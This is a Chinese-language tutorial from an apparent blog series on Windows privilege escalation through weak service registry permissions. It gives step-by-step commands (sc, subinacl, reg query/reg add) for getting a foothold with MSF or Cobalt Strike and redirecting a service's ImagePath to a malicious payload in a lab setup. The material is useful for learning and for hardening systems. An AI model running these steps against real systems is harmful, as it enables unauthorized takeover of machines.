操作系统权限提升(七)之系统错误配置-不安全注册表提权

系列文章

操作系统权限提升(一)之操作系统权限介绍
操作系统权限提升(二)之常见提权的环境介绍
操作系统权限提升(三)之Windows系统内核溢出漏洞提权
操作系统权限提升(四)之系统错误配置-Tusted Service Paths提权
操作系统权限提升(五)之系统错误配置-PATH环境变量提权
操作系统权限提升(六)之系统错误配置-不安全的服务提权

注：阅读本编文章前，请先阅读系列文章，以免造成看不懂的情况！！

不安全注册表提权

不安全注册表提权的原理

Windows的服务路径存储在Windows的注册表中，若注册表配置不当，当攻击者可以发现使用低权限可以更改注册表的选项的时候，就可以导致提权，可以将 imagepath 修改成恶意的文件，重启导致提权

提权环境准备

1、新建立一个服务，test

sc create test binpath= "C:\1.exe"

2、打开注册表给该文件权限

或者用工具

shell subinacl /keyreg "HKEY_LOCAL_MACHINE\system\ControlSet001\Services\test" /grant=apache=f

不安全注册表提权实战

1、先使用MSF或者CS上线靶机

2、查询计算机中的所有服务

sc query type= all state= all |findstr /i service_name.* |more

3、使用subinacl进行查询提权

shell subinacl /keyreg "HKEY_LOCAL_MACHINE\system\ControlSet001\Services\test" /display

4、查询该服务的 imagepath 值

reg query HKEY_LOCAL_MACHINE\system\ControlSet001\Services\test /v imagepath

5、查看上传的cs的恶意程序文件路劲并记录下来

6、替换该文件为恶意的文件或者修改文件的路径

reg add "HKEY_LOCAL_MACHINE\system\ControlSet001\Services\test" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\apache\Desktop\1.exe" /f

7、查询是否替换

reg query HKEY_LOCAL_MACHINE\system\ControlSet001\services\test /v imagepath

这里可以看到我们的服务路劲已经被篡改了

8、这个时候apache是没有权限启动服务的，需要管理员重启电脑

这里我们模拟管理员启动这个服务

sc strat test

9、提权成功